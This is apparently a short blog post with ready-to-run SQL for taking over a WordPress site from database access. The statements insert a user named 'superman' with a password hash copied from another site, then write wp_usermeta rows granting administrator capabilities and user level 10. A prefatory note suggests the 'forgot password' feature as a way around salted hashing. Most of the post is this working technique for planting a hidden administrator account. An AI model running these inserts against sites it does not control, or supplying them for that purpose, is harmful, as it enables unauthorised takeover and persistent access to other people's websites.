Image
Note: This doesn't work on newer versions of Wordpress if the user has properly enabled salted hashing. You can probably use the "forgot password" feature to get a working one, though, if you're willing to give it a legit email address.
Say you have access to Wordpress' database and want to gain control of the site itself. Creating a superuser account is simple if you can copy the password hash from another Wordpress site:
INSERT INTO wp_users (
user_login, user_pass, user_nicename, user_email,
user_registered, user_status, display_name
) VALUES (
'superman', '$P$BQzrWb9o/Rg7Z15jQOaS9PzZ/H/xHY0',
'superman', 'superman@krypton.com', NOW(), 0, 'superman'
);
INSERT INTO wp_usermeta (user_id,meta_key,meta_value) VALUES (
(SELECT ID FROM wp_users WHERE user_login='superman'),
'wp_capabilities',
'a:1:{s:13:"administrator";s:1:"1";}'
);
INSERT INTO wp_usermeta (user_id,meta_key,meta_value) VALUES (
(SELECT ID FROM wp_users WHERE user_login='superman'),
'wp_user_level',
10
);